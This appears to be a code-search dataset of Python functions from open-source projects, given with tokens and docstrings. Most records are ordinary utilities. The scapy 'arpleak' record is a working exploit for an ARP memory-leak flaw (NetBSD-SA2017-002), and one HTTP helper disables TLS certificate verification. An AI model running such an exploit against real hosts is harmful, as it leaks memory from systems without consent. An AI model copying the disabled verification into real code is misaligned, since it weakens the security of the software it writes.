salt/utils/virtualbox.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/virtualbox.py#L436-L475
def vb_start_vm(name=None, timeout=10000, **kwargs): ''' Tells Virtualbox to start up a VM. Blocking function! @param name: @type name: str @param timeout: Maximum time in milliseconds to wait or -1 to wait indefinitely @type timeout: int @return untreated dict of started VM ''' # Time tracking start_time = time.time() timeout_in_seconds = timeout / 1000 max_time = start_time + timeout_in_seconds vbox = vb_get_box() machine = vbox.findMachine(name) session = _virtualboxManager.getSessionObject(vbox) log.info('Starting machine %s in state %s', name, vb_machinestate_to_str(machine.state)) try: # Keep trying to start a machine args = (machine, session) progress = wait_for(_start_machine, timeout=timeout_in_seconds, func_args=args) if not progress: progress = machine.launchVMProcess(session, '', '') # We already waited for stuff, don't push it time_left = max_time - time.time() progress.waitForCompletion(time_left * 1000) finally: _virtualboxManager.closeMachineSession(session) # The session state should best be unlocked otherwise subsequent calls might cause problems time_left = max_time - time.time() vb_wait_for_session_state(session, timeout=time_left) log.info('Started machine %s', name) return vb_xpcom_to_attribute_dict(machine, 'IMachine')
[ "def", "vb_start_vm", "(", "name", "=", "None", ",", "timeout", "=", "10000", ",", "*", "*", "kwargs", ")", ":", "# Time tracking", "start_time", "=", "time", ".", "time", "(", ")", "timeout_in_seconds", "=", "timeout", "/", "1000", "max_time", "=", "start_time", "+", "timeout_in_seconds", "vbox", "=", "vb_get_box", "(", ")", "machine", "=", "vbox", ".", "findMachine", "(", "name", ")", "session", "=", "_virtualboxManager", ".", "getSessionObject", "(", "vbox", ")", "log", ".", "info", "(", "'Starting machine %s in state %s'", ",", "name", ",", "vb_machinestate_to_str", "(", "machine", ".", "state", ")", ")", "try", ":", "# Keep trying to start a machine", "args", "=", "(", "machine", ",", "session", ")", "progress", "=", "wait_for", "(", "_start_machine", ",", "timeout", "=", "timeout_in_seconds", ",", "func_args", "=", "args", ")", "if", "not", "progress", ":", "progress", "=", "machine", ".", "launchVMProcess", "(", "session", ",", "''", ",", "''", ")", "# We already waited for stuff, don't push it", "time_left", "=", "max_time", "-", "time", ".", "time", "(", ")", "progress", ".", "waitForCompletion", "(", "time_left", "*", "1000", ")", "finally", ":", "_virtualboxManager", ".", "closeMachineSession", "(", "session", ")", "# The session state should best be unlocked otherwise subsequent calls might cause problems", "time_left", "=", "max_time", "-", "time", ".", "time", "(", ")", "vb_wait_for_session_state", "(", "session", ",", "timeout", "=", "time_left", ")", "log", ".", "info", "(", "'Started machine %s'", ",", "name", ")", "return", "vb_xpcom_to_attribute_dict", "(", "machine", ",", "'IMachine'", ")" ]
Tells Virtualbox to start up a VM. Blocking function! @param name: @type name: str @param timeout: Maximum time in milliseconds to wait or -1 to wait indefinitely @type timeout: int @return untreated dict of started VM
[ "Tells", "Virtualbox", "to", "start", "up", "a", "VM", ".", "Blocking", "function!" ]
python
train
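A hedged usage sketch for vb_start_vm; it assumes a salt minion with the VirtualBox SDK configured and a VM named 'test-vm' (both assumptions), and the 'name'/'state' keys on the returned attribute dict are likewise assumed.

import salt.utils.virtualbox as vb

machine = vb.vb_start_vm(name='test-vm', timeout=30000)  # block up to 30 s
print(machine.get('name'), machine.get('state'))         # dict keys assumed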
saltstack/salt
salt/states/netsnmp.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/states/netsnmp.py#L133-L141
def _str_elem(config, key): ''' Re-adds the value of a specific key in the dict, only in case of valid str value. ''' _value = config.pop(key, '') if _valid_str(_value): config[key] = _value
[ "def", "_str_elem", "(", "config", ",", "key", ")", ":", "_value", "=", "config", ".", "pop", "(", "key", ",", "''", ")", "if", "_valid_str", "(", "_value", ")", ":", "config", "[", "key", "]", "=", "_value" ]
Re-adds the value of a specific key in the dict, only in case of valid str value.
[ "Re", "-", "adds", "the", "value", "of", "a", "specific", "key", "in", "the", "dict", "only", "in", "case", "of", "valid", "str", "value", "." ]
python
train
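A runnable sketch of the helper's contract when paired with the function above: the key is always popped, and only re-added when the value passes the module's string check. _valid_str is defined elsewhere in the module, so a stand-in predicate is used here, and the config keys are illustrative.

def _valid_str(value):                       # stand-in for the module's predicate
    return isinstance(value, str) and len(value) > 0

config = {'contact': 'noc@example.com', 'location': ''}
for key in ('contact', 'location'):
    _str_elem(config, key)
print(config)                                # {'contact': 'noc@example.com'}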
CitrineInformatics/python-citrination-client
citrination_client/base/base_client.py
https://github.com/CitrineInformatics/python-citrination-client/blob/409984fc65ce101a620f069263f155303492465c/citrination_client/base/base_client.py#L96-L110
def _post(self, route, data, headers=None, failure_message=None): """ Execute a post request and return the result :param data: :param headers: :return: """ headers = self._get_headers(headers) response_lambda = ( lambda: requests.post( self._get_qualified_route(route), headers=headers, data=data, verify=False, proxies=self.proxies ) ) response = check_for_rate_limiting(response_lambda(), response_lambda) return self._handle_response(response, failure_message)
[ "def", "_post", "(", "self", ",", "route", ",", "data", ",", "headers", "=", "None", ",", "failure_message", "=", "None", ")", ":", "headers", "=", "self", ".", "_get_headers", "(", "headers", ")", "response_lambda", "=", "(", "lambda", ":", "requests", ".", "post", "(", "self", ".", "_get_qualified_route", "(", "route", ")", ",", "headers", "=", "headers", ",", "data", "=", "data", ",", "verify", "=", "False", ",", "proxies", "=", "self", ".", "proxies", ")", ")", "response", "=", "check_for_rate_limiting", "(", "response_lambda", "(", ")", ",", "response_lambda", ")", "return", "self", ".", "_handle_response", "(", "response", ",", "failure_message", ")" ]
Execute a post request and return the result :param data: :param headers: :return:
[ "Execute", "a", "post", "request", "and", "return", "the", "result", ":", "param", "data", ":", ":", "param", "headers", ":", ":", "return", ":" ]
python
valid
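The zero-argument lambda is the design choice worth noticing: it lets check_for_rate_limiting re-issue an identical request when the first attempt was throttled. A reduced, self-contained sketch of that pattern (single retry only; the helper here is a stand-in with the same shape, and the URL is illustrative):

import requests

def check_for_rate_limiting(response, response_lambda):
    if response.status_code == 429:    # rate limited: issue the request again
        return response_lambda()
    return response

response_lambda = lambda: requests.get('https://httpbin.org/get')
response = check_for_rate_limiting(response_lambda(), response_lambda)
print(response.status_code)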
bhmm/bhmm
bhmm/estimators/maximum_likelihood.py
https://github.com/bhmm/bhmm/blob/9804d18c2ddb684fb4d90b544cc209617a89ca9a/bhmm/estimators/maximum_likelihood.py#L332-L352
def compute_viterbi_paths(self): """ Computes the viterbi paths using the current HMM model """ # get parameters K = len(self._observations) A = self._hmm.transition_matrix pi = self._hmm.initial_distribution # compute viterbi path for each trajectory paths = np.empty(K, dtype=object) for itraj in range(K): obs = self._observations[itraj] # compute output probability matrix pobs = self._hmm.output_model.p_obs(obs) # hidden path paths[itraj] = hidden.viterbi(A, pobs, pi) # done return paths
[ "def", "compute_viterbi_paths", "(", "self", ")", ":", "# get parameters", "K", "=", "len", "(", "self", ".", "_observations", ")", "A", "=", "self", ".", "_hmm", ".", "transition_matrix", "pi", "=", "self", ".", "_hmm", ".", "initial_distribution", "# compute viterbi path for each trajectory", "paths", "=", "np", ".", "empty", "(", "K", ",", "dtype", "=", "object", ")", "for", "itraj", "in", "range", "(", "K", ")", ":", "obs", "=", "self", ".", "_observations", "[", "itraj", "]", "# compute output probability matrix", "pobs", "=", "self", ".", "_hmm", ".", "output_model", ".", "p_obs", "(", "obs", ")", "# hidden path", "paths", "[", "itraj", "]", "=", "hidden", ".", "viterbi", "(", "A", ",", "pobs", ",", "pi", ")", "# done", "return", "paths" ]
Computes the viterbi paths using the current HMM model
[ "Computes", "the", "viterbi", "paths", "using", "the", "current", "HMM", "model" ]
python
train
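For readers curious what hidden.viterbi(A, pobs, pi) computes per trajectory, here is a self-contained log-space Viterbi sketch over the same inputs: transition matrix A, per-frame output probabilities pobs, and initial distribution pi. This is an illustration, not bhmm's implementation.

import numpy as np

def viterbi(A, pobs, pi):
    T, N = pobs.shape
    logv = np.log(pi) + np.log(pobs[0])     # best log-prob ending in each state
    ptr = np.zeros((T, N), dtype=int)       # backpointers
    for t in range(1, T):
        scores = logv[:, None] + np.log(A)  # scores[i, j]: arrive in j from i
        ptr[t] = scores.argmax(axis=0)
        logv = scores.max(axis=0) + np.log(pobs[t])
    path = np.empty(T, dtype=int)
    path[-1] = logv.argmax()
    for t in range(T - 2, -1, -1):          # backtrack along the pointers
        path[t] = ptr[t + 1, path[t + 1]]
    return path

A = np.array([[0.9, 0.1], [0.2, 0.8]])
pobs = np.array([[0.8, 0.2], [0.6, 0.4], [0.1, 0.9]])
print(viterbi(A, pobs, np.array([0.5, 0.5])))  # [1 1 1] for this toy input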
seleniumbase/SeleniumBase
seleniumbase/fixtures/base_case.py
https://github.com/seleniumbase/SeleniumBase/blob/62e5b43ee1f90a9ed923841bdd53b1b38358f43a/seleniumbase/fixtures/base_case.py#L906-L965
def create_shepherd_tour(self, name=None, theme=None): """ Creates a Shepherd JS website tour. @Params name - If creating multiple tours at the same time, use this to select the tour you wish to add steps to. theme - Sets the default theme for the tour. Choose from "light"/"arrows", "dark", "default", "square", and "square-dark". ("light" is used if None is selected.) """ shepherd_theme = "shepherd-theme-arrows" if theme: if theme.lower() == "default": shepherd_theme = "shepherd-theme-default" elif theme.lower() == "dark": shepherd_theme = "shepherd-theme-dark" elif theme.lower() == "light": shepherd_theme = "shepherd-theme-arrows" elif theme.lower() == "arrows": shepherd_theme = "shepherd-theme-arrows" elif theme.lower() == "square": shepherd_theme = "shepherd-theme-square" elif theme.lower() == "square-dark": shepherd_theme = "shepherd-theme-square-dark" if not name: name = "default" new_tour = ( """ // Shepherd Tour var tour = new Shepherd.Tour({ defaults: { classes: '%s', scrollTo: true } }); var allButtons = { skip: { text: "Skip", action: tour.cancel, classes: 'shepherd-button-secondary tour-button-left' }, back: { text: "Back", action: tour.back, classes: 'shepherd-button-secondary' }, next: { text: "Next", action: tour.next, classes: 'shepherd-button-primary tour-button-right' }, }; var firstStepButtons = [allButtons.skip, allButtons.next]; var midTourButtons = [allButtons.back, allButtons.next]; """ % shepherd_theme) self._tour_steps[name] = [] self._tour_steps[name].append(new_tour)
[ "def", "create_shepherd_tour", "(", "self", ",", "name", "=", "None", ",", "theme", "=", "None", ")", ":", "shepherd_theme", "=", "\"shepherd-theme-arrows\"", "if", "theme", ":", "if", "theme", ".", "lower", "(", ")", "==", "\"default\"", ":", "shepherd_theme", "=", "\"shepherd-theme-default\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"dark\"", ":", "shepherd_theme", "=", "\"shepherd-theme-dark\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"light\"", ":", "shepherd_theme", "=", "\"shepherd-theme-arrows\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"arrows\"", ":", "shepherd_theme", "=", "\"shepherd-theme-arrows\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"square\"", ":", "shepherd_theme", "=", "\"shepherd-theme-square\"", "elif", "theme", ".", "lower", "(", ")", "==", "\"square-dark\"", ":", "shepherd_theme", "=", "\"shepherd-theme-square-dark\"", "if", "not", "name", ":", "name", "=", "\"default\"", "new_tour", "=", "(", "\"\"\"\n // Shepherd Tour\n var tour = new Shepherd.Tour({\n defaults: {\n classes: '%s',\n scrollTo: true\n }\n });\n var allButtons = {\n skip: {\n text: \"Skip\",\n action: tour.cancel,\n classes: 'shepherd-button-secondary tour-button-left'\n },\n back: {\n text: \"Back\",\n action: tour.back,\n classes: 'shepherd-button-secondary'\n },\n next: {\n text: \"Next\",\n action: tour.next,\n classes: 'shepherd-button-primary tour-button-right'\n },\n };\n var firstStepButtons = [allButtons.skip, allButtons.next];\n var midTourButtons = [allButtons.back, allButtons.next];\n \"\"\"", "%", "shepherd_theme", ")", "self", ".", "_tour_steps", "[", "name", "]", "=", "[", "]", "self", ".", "_tour_steps", "[", "name", "]", ".", "append", "(", "new_tour", ")" ]
Creates a Shepherd JS website tour. @Params name - If creating multiple tours at the same time, use this to select the tour you wish to add steps to. theme - Sets the default theme for the tour. Choose from "light"/"arrows", "dark", "default", "square", and "square-dark". ("light" is used if None is selected.)
[ "Creates", "a", "Shepherd", "JS", "website", "tour", "." ]
python
train
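A hedged usage sketch inside a SeleniumBase test class; add_tour_step and play_tour are companion methods of the same fixture module, and the page URL and selector are illustrative.

from seleniumbase import BaseCase

class TourTest(BaseCase):
    def test_shepherd_tour(self):
        self.open("https://example.com")
        self.create_shepherd_tour(theme="dark")
        self.add_tour_step("Welcome!", "h1")
        self.play_tour()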
paulovn/sparql-kernel
sparqlkernel/connection.py
https://github.com/paulovn/sparql-kernel/blob/1d2d155ff5da72070cb2a98fae33ea8113fac782/sparqlkernel/connection.py#L181-L190
def lang_match_xml(row, accepted_languages): '''Find if the XML row contains acceptable language data''' if not accepted_languages: return True column_languages = set() for elem in row: lang = elem[0].attrib.get(XML_LANG, None) if lang: column_languages.add(lang) return (not column_languages) or (column_languages & accepted_languages)
[ "def", "lang_match_xml", "(", "row", ",", "accepted_languages", ")", ":", "if", "not", "accepted_languages", ":", "return", "True", "column_languages", "=", "set", "(", ")", "for", "elem", "in", "row", ":", "lang", "=", "elem", "[", "0", "]", ".", "attrib", ".", "get", "(", "XML_LANG", ",", "None", ")", "if", "lang", ":", "column_languages", ".", "add", "(", "lang", ")", "return", "(", "not", "column_languages", ")", "or", "(", "column_languages", "&", "accepted_languages", ")" ]
Find if the XML row contains acceptable language data
[ "Find", "if", "the", "XML", "row", "contains", "acceptable", "language", "data" ]
python
train
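A runnable sketch when paired with the function above: a row is an iterable of <binding> elements whose first child may carry an xml:lang attribute. Note that on a match the function returns a truthy set rather than a strict boolean, hence the bool() wrappers.

import xml.etree.ElementTree as ET

XML_LANG = '{http://www.w3.org/XML/1998/namespace}lang'
row = ET.fromstring(
    '<result>'
    '<binding><literal xml:lang="en">cat</literal></binding>'
    '</result>')
print(bool(lang_match_xml(row, {'en'})))  # True  -- 'en' overlaps
print(bool(lang_match_xml(row, {'fr'})))  # False -- no overlap
print(bool(lang_match_xml(row, set())))   # True  -- empty filter accepts everything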
secdev/scapy
scapy/layers/l2.py
https://github.com/secdev/scapy/blob/3ffe757c184017dd46464593a8f80f85abc1e79a/scapy/layers/l2.py#L736-L785
def arpleak(target, plen=255, hwlen=255, **kargs): """Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc """ # We want explicit packets pkts_iface = {} for pkt in ARP(pdst=target): # We have to do some of Scapy's work since we mess with # important values iface = conf.route.route(pkt.pdst)[0] psrc = get_if_addr(iface) hwsrc = get_if_hwaddr(iface) pkt.plen = plen pkt.hwlen = hwlen if plen == 4: pkt.psrc = psrc else: pkt.psrc = inet_aton(psrc)[:plen] pkt.pdst = inet_aton(pkt.pdst)[:plen] if hwlen == 6: pkt.hwsrc = hwsrc else: pkt.hwsrc = mac2str(hwsrc)[:hwlen] pkts_iface.setdefault(iface, []).append( Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt ) ans, unans = SndRcvList(), PacketList(name="Unanswered") for iface, pkts in viewitems(pkts_iface): ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs) ans += ans_new unans += unans_new ans.listname = "Results" unans.listname = "Unanswered" for _, rcv in ans: if ARP not in rcv: continue rcv = rcv[ARP] psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc) if plen > 4 and len(psrc) > 4: print("psrc") hexdump(psrc[4:]) print() hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc) if hwlen > 6 and len(hwsrc) > 6: print("hwsrc") hexdump(hwsrc[6:]) print() return ans, unans
[ "def", "arpleak", "(", "target", ",", "plen", "=", "255", ",", "hwlen", "=", "255", ",", "*", "*", "kargs", ")", ":", "# We want explicit packets", "pkts_iface", "=", "{", "}", "for", "pkt", "in", "ARP", "(", "pdst", "=", "target", ")", ":", "# We have to do some of Scapy's work since we mess with", "# important values", "iface", "=", "conf", ".", "route", ".", "route", "(", "pkt", ".", "pdst", ")", "[", "0", "]", "psrc", "=", "get_if_addr", "(", "iface", ")", "hwsrc", "=", "get_if_hwaddr", "(", "iface", ")", "pkt", ".", "plen", "=", "plen", "pkt", ".", "hwlen", "=", "hwlen", "if", "plen", "==", "4", ":", "pkt", ".", "psrc", "=", "psrc", "else", ":", "pkt", ".", "psrc", "=", "inet_aton", "(", "psrc", ")", "[", ":", "plen", "]", "pkt", ".", "pdst", "=", "inet_aton", "(", "pkt", ".", "pdst", ")", "[", ":", "plen", "]", "if", "hwlen", "==", "6", ":", "pkt", ".", "hwsrc", "=", "hwsrc", "else", ":", "pkt", ".", "hwsrc", "=", "mac2str", "(", "hwsrc", ")", "[", ":", "hwlen", "]", "pkts_iface", ".", "setdefault", "(", "iface", ",", "[", "]", ")", ".", "append", "(", "Ether", "(", "src", "=", "hwsrc", ",", "dst", "=", "ETHER_BROADCAST", ")", "/", "pkt", ")", "ans", ",", "unans", "=", "SndRcvList", "(", ")", ",", "PacketList", "(", "name", "=", "\"Unanswered\"", ")", "for", "iface", ",", "pkts", "in", "viewitems", "(", "pkts_iface", ")", ":", "ans_new", ",", "unans_new", "=", "srp", "(", "pkts", ",", "iface", "=", "iface", ",", "filter", "=", "\"arp\"", ",", "*", "*", "kargs", ")", "ans", "+=", "ans_new", "unans", "+=", "unans_new", "ans", ".", "listname", "=", "\"Results\"", "unans", ".", "listname", "=", "\"Unanswered\"", "for", "_", ",", "rcv", "in", "ans", ":", "if", "ARP", "not", "in", "rcv", ":", "continue", "rcv", "=", "rcv", "[", "ARP", "]", "psrc", "=", "rcv", ".", "get_field", "(", "'psrc'", ")", ".", "i2m", "(", "rcv", ",", "rcv", ".", "psrc", ")", "if", "plen", ">", "4", "and", "len", "(", "psrc", ")", ">", "4", ":", "print", "(", "\"psrc\"", ")", "hexdump", "(", "psrc", "[", "4", ":", "]", ")", "print", "(", ")", "hwsrc", "=", "rcv", ".", "get_field", "(", "'hwsrc'", ")", ".", "i2m", "(", "rcv", ",", "rcv", ".", "hwsrc", ")", "if", "hwlen", ">", "6", "and", "len", "(", "hwsrc", ")", ">", "6", ":", "print", "(", "\"hwsrc\"", ")", "hexdump", "(", "hwsrc", "[", "6", ":", "]", ")", "print", "(", ")", "return", "ans", ",", "unans" ]
Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
[ "Exploit", "ARP", "leak", "flaws", "like", "NetBSD", "-", "SA2017", "-", "002", "." ]
python
train
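A hedged invocation sketch (root privileges and a reachable target are required; the address is illustrative). Extra keyword arguments such as timeout pass through **kargs to scapy's srp().

from scapy.layers.l2 import arpleak

ans, unans = arpleak("192.168.0.1", plen=255, hwlen=255, timeout=2)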
thelabnyc/wagtail_blog
blog/management/commands/wordpress_to_wagtail.py
https://github.com/thelabnyc/wagtail_blog/blob/7e092c02d10ec427c9a2c4b5dcbe910d88c628cf/blog/management/commands/wordpress_to_wagtail.py#L64-L99
def handle(self, *args, **options): """gets data from WordPress site""" # TODO: refactor these with .get if 'username' in options: self.username = options['username'] else: self.username = None if 'password' in options: self.password = options['password'] else: self.password = None self.xml_path = options.get('xml') self.url = options.get('url') try: blog_index = BlogIndexPage.objects.get( title__icontains=options['blog_index']) except BlogIndexPage.DoesNotExist: raise CommandError("Incorrect blog index title - have you created it?") if self.url == "just_testing": with open('test-data.json') as test_json: posts = json.load(test_json) elif self.xml_path: try: import lxml from blog.wp_xml_parser import XML_parser except ImportError as e: print("You must have lxml installed to run xml imports." " Run `pip install lxml`.") raise e self.xml_parser = XML_parser(self.xml_path) posts = self.xml_parser.get_posts_data() else: posts = self.get_posts_data(self.url) self.should_import_comments = options.get('import_comments') self.create_blog_pages(posts, blog_index)
[ "def", "handle", "(", "self", ",", "*", "args", ",", "*", "*", "options", ")", ":", "# TODO: refactor these with .get", "if", "'username'", "in", "options", ":", "self", ".", "username", "=", "options", "[", "'username'", "]", "else", ":", "self", ".", "username", "=", "None", "if", "'password'", "in", "options", ":", "self", ".", "password", "=", "options", "[", "'password'", "]", "else", ":", "self", ".", "password", "=", "None", "self", ".", "xml_path", "=", "options", ".", "get", "(", "'xml'", ")", "self", ".", "url", "=", "options", ".", "get", "(", "'url'", ")", "try", ":", "blog_index", "=", "BlogIndexPage", ".", "objects", ".", "get", "(", "title__icontains", "=", "options", "[", "'blog_index'", "]", ")", "except", "BlogIndexPage", ".", "DoesNotExist", ":", "raise", "CommandError", "(", "\"Incorrect blog index title - have you created it?\"", ")", "if", "self", ".", "url", "==", "\"just_testing\"", ":", "with", "open", "(", "'test-data.json'", ")", "as", "test_json", ":", "posts", "=", "json", ".", "load", "(", "test_json", ")", "elif", "self", ".", "xml_path", ":", "try", ":", "import", "lxml", "from", "blog", ".", "wp_xml_parser", "import", "XML_parser", "except", "ImportError", "as", "e", ":", "print", "(", "\"You must have lxml installed to run xml imports.\"", "\" Run `pip install lxml`.\"", ")", "raise", "e", "self", ".", "xml_parser", "=", "XML_parser", "(", "self", ".", "xml_path", ")", "posts", "=", "self", ".", "xml_parser", ".", "get_posts_data", "(", ")", "else", ":", "posts", "=", "self", ".", "get_posts_data", "(", "self", ".", "url", ")", "self", ".", "should_import_comments", "=", "options", ".", "get", "(", "'import_comments'", ")", "self", ".", "create_blog_pages", "(", "posts", ",", "blog_index", ")" ]
gets data from WordPress site
[ "gets", "data", "from", "WordPress", "site" ]
python
train
pyrogram/pyrogram
pyrogram/client/client.py
https://github.com/pyrogram/pyrogram/blob/e7258a341ba905cfa86264c22040654db732ec1c/pyrogram/client/client.py#L1315-L1386
def resolve_peer(self, peer_id: Union[int, str]): """Use this method to get the InputPeer of a known peer_id. This is a utility method intended to be used **only** when working with Raw Functions (i.e: a Telegram API method you wish to use which is not available yet in the Client class as an easy-to-use method), whenever an InputPeer type is required. Args: peer_id (``int`` | ``str``): The peer id you want to extract the InputPeer from. Can be a direct id (int), a username (str) or a phone number (str). Returns: On success, the resolved peer id is returned in form of an InputPeer object. Raises: :class:`RPCError <pyrogram.RPCError>` in case of a Telegram RPC error. ``KeyError`` in case the peer doesn't exist in the internal database. """ try: return self.peers_by_id[peer_id] except KeyError: if type(peer_id) is str: if peer_id in ("self", "me"): return types.InputPeerSelf() peer_id = re.sub(r"[@+\s]", "", peer_id.lower()) try: int(peer_id) except ValueError: if peer_id not in self.peers_by_username: self.send( functions.contacts.ResolveUsername( username=peer_id ) ) return self.peers_by_username[peer_id] else: try: return self.peers_by_phone[peer_id] except KeyError: raise PeerIdInvalid if peer_id > 0: self.fetch_peers( self.send( functions.users.GetUsers( id=[types.InputUser(user_id=peer_id, access_hash=0)] ) ) ) else: if str(peer_id).startswith("-100"): self.send( functions.channels.GetChannels( id=[types.InputChannel(channel_id=int(str(peer_id)[4:]), access_hash=0)] ) ) else: self.send( functions.messages.GetChats( id=[-peer_id] ) ) try: return self.peers_by_id[peer_id] except KeyError: raise PeerIdInvalid
[ "def", "resolve_peer", "(", "self", ",", "peer_id", ":", "Union", "[", "int", ",", "str", "]", ")", ":", "try", ":", "return", "self", ".", "peers_by_id", "[", "peer_id", "]", "except", "KeyError", ":", "if", "type", "(", "peer_id", ")", "is", "str", ":", "if", "peer_id", "in", "(", "\"self\"", ",", "\"me\"", ")", ":", "return", "types", ".", "InputPeerSelf", "(", ")", "peer_id", "=", "re", ".", "sub", "(", "r\"[@+\\s]\"", ",", "\"\"", ",", "peer_id", ".", "lower", "(", ")", ")", "try", ":", "int", "(", "peer_id", ")", "except", "ValueError", ":", "if", "peer_id", "not", "in", "self", ".", "peers_by_username", ":", "self", ".", "send", "(", "functions", ".", "contacts", ".", "ResolveUsername", "(", "username", "=", "peer_id", ")", ")", "return", "self", ".", "peers_by_username", "[", "peer_id", "]", "else", ":", "try", ":", "return", "self", ".", "peers_by_phone", "[", "peer_id", "]", "except", "KeyError", ":", "raise", "PeerIdInvalid", "if", "peer_id", ">", "0", ":", "self", ".", "fetch_peers", "(", "self", ".", "send", "(", "functions", ".", "users", ".", "GetUsers", "(", "id", "=", "[", "types", ".", "InputUser", "(", "user_id", "=", "peer_id", ",", "access_hash", "=", "0", ")", "]", ")", ")", ")", "else", ":", "if", "str", "(", "peer_id", ")", ".", "startswith", "(", "\"-100\"", ")", ":", "self", ".", "send", "(", "functions", ".", "channels", ".", "GetChannels", "(", "id", "=", "[", "types", ".", "InputChannel", "(", "channel_id", "=", "int", "(", "str", "(", "peer_id", ")", "[", "4", ":", "]", ")", ",", "access_hash", "=", "0", ")", "]", ")", ")", "else", ":", "self", ".", "send", "(", "functions", ".", "messages", ".", "GetChats", "(", "id", "=", "[", "-", "peer_id", "]", ")", ")", "try", ":", "return", "self", ".", "peers_by_id", "[", "peer_id", "]", "except", "KeyError", ":", "raise", "PeerIdInvalid" ]
Use this method to get the InputPeer of a known peer_id. This is a utility method intended to be used **only** when working with Raw Functions (i.e: a Telegram API method you wish to use which is not available yet in the Client class as an easy-to-use method), whenever an InputPeer type is required. Args: peer_id (``int`` | ``str``): The peer id you want to extract the InputPeer from. Can be a direct id (int), a username (str) or a phone number (str). Returns: On success, the resolved peer id is returned in form of an InputPeer object. Raises: :class:`RPCError <pyrogram.RPCError>` in case of a Telegram RPC error. ``KeyError`` in case the peer doesn't exist in the internal database.
[ "Use", "this", "method", "to", "get", "the", "InputPeer", "of", "a", "known", "peer_id", "." ]
python
train
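A hedged usage sketch against the 0.x-era client API shown above; the session name is an assumption.

from pyrogram import Client

app = Client("my_account")
app.start()
peer = app.resolve_peer("me")   # -> types.InputPeerSelf()
app.stop()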
dslackw/slpkg
slpkg/pkg/manager.py
https://github.com/dslackw/slpkg/blob/dd2e08a80e944d337d157b992167ba631a4343de/slpkg/pkg/manager.py#L524-L539
def list_lib(self, repo): """Return package lists """ packages = "" if repo == "sbo": if (os.path.isfile( self.meta.lib_path + "{0}_repo/SLACKBUILDS.TXT".format( repo))): packages = Utils().read_file(self.meta.lib_path + "{0}_repo/" "SLACKBUILDS.TXT".format(repo)) else: if (os.path.isfile( self.meta.lib_path + "{0}_repo/PACKAGES.TXT".format(repo))): packages = Utils().read_file(self.meta.lib_path + "{0}_repo/" "PACKAGES.TXT".format(repo)) return packages
[ "def", "list_lib", "(", "self", ",", "repo", ")", ":", "packages", "=", "\"\"", "if", "repo", "==", "\"sbo\"", ":", "if", "(", "os", ".", "path", ".", "isfile", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/SLACKBUILDS.TXT\"", ".", "format", "(", "repo", ")", ")", ")", ":", "packages", "=", "Utils", "(", ")", ".", "read_file", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/\"", "\"SLACKBUILDS.TXT\"", ".", "format", "(", "repo", ")", ")", "else", ":", "if", "(", "os", ".", "path", ".", "isfile", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/PACKAGES.TXT\"", ".", "format", "(", "repo", ")", ")", ")", ":", "packages", "=", "Utils", "(", ")", ".", "read_file", "(", "self", ".", "meta", ".", "lib_path", "+", "\"{0}_repo/\"", "\"PACKAGES.TXT\"", ".", "format", "(", "repo", ")", ")", "return", "packages" ]
Return package lists
[ "Return", "package", "lists" ]
python
train
ChristopherRabotin/bungiesearch
bungiesearch/__init__.py
https://github.com/ChristopherRabotin/bungiesearch/blob/13768342bc2698b214eb0003c2d113b6e273c30d/bungiesearch/__init__.py#L132-L141
def get_models(cls, index, as_class=False): ''' Returns the list of models defined for this index. :param index: index name. :param as_class: set to True to return the model as a model object instead of as a string. ''' try: return cls._index_to_model[index] if as_class else cls._idx_name_to_mdl_to_mdlidx[index].keys() except KeyError: raise KeyError('Could not find any index named {}. Is this index defined in BUNGIESEARCH["INDICES"]?'.format(index))
[ "def", "get_models", "(", "cls", ",", "index", ",", "as_class", "=", "False", ")", ":", "try", ":", "return", "cls", ".", "_index_to_model", "[", "index", "]", "if", "as_class", "else", "cls", ".", "_idx_name_to_mdl_to_mdlidx", "[", "index", "]", ".", "keys", "(", ")", "except", "KeyError", ":", "raise", "KeyError", "(", "'Could not find any index named {}. Is this index defined in BUNGIESEARCH[\"INDICES\"]?'", ".", "format", "(", "index", ")", ")" ]
Returns the list of models defined for this index. :param index: index name. :param as_class: set to True to return the model as a model object instead of as a string.
[ "Returns", "the", "list", "of", "models", "defined", "for", "this", "index", ".", ":", "param", "index", ":", "index", "name", ".", ":", "param", "as_class", ":", "set", "to", "True", "to", "return", "the", "model", "as", "a", "model", "object", "instead", "of", "as", "a", "string", "." ]
python
train
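A hedged usage sketch; 'demo_index' is an assumption and must name an index defined in BUNGIESEARCH["INDICES"].

from bungiesearch import Bungiesearch

model_names = Bungiesearch.get_models('demo_index')                   # model names
model_classes = Bungiesearch.get_models('demo_index', as_class=True)  # model classes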
chrissimpkins/crypto
lib/crypto/library/package.py
https://github.com/chrissimpkins/crypto/blob/6b95fa81b26312e46f02557dca0b5f5c898a76fd/lib/crypto/library/package.py#L28-L32
def remove_tar_files(file_list): """Public function that removes temporary tar archive files in a local directory""" for f in file_list: if file_exists(f) and f.endswith('.tar'): os.remove(f)
[ "def", "remove_tar_files", "(", "file_list", ")", ":", "for", "f", "in", "file_list", ":", "if", "file_exists", "(", "f", ")", "and", "f", ".", "endswith", "(", "'.tar'", ")", ":", "os", ".", "remove", "(", "f", ")" ]
Public function that removes temporary tar archive files in a local directory
[ "Public", "function", "that", "removes", "temporary", "tar", "archive", "files", "in", "a", "local", "directory" ]
python
train
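A runnable sketch when paired with the function above; file_exists is the library's own helper, stubbed here with os.path.isfile.

import os
import tempfile

def file_exists(path):           # stand-in for the crypto library's helper
    return os.path.isfile(path)

tmp = tempfile.mkdtemp()
paths = [os.path.join(tmp, name) for name in ('a.tar', 'b.txt')]
for p in paths:
    open(p, 'w').close()
remove_tar_files(paths)
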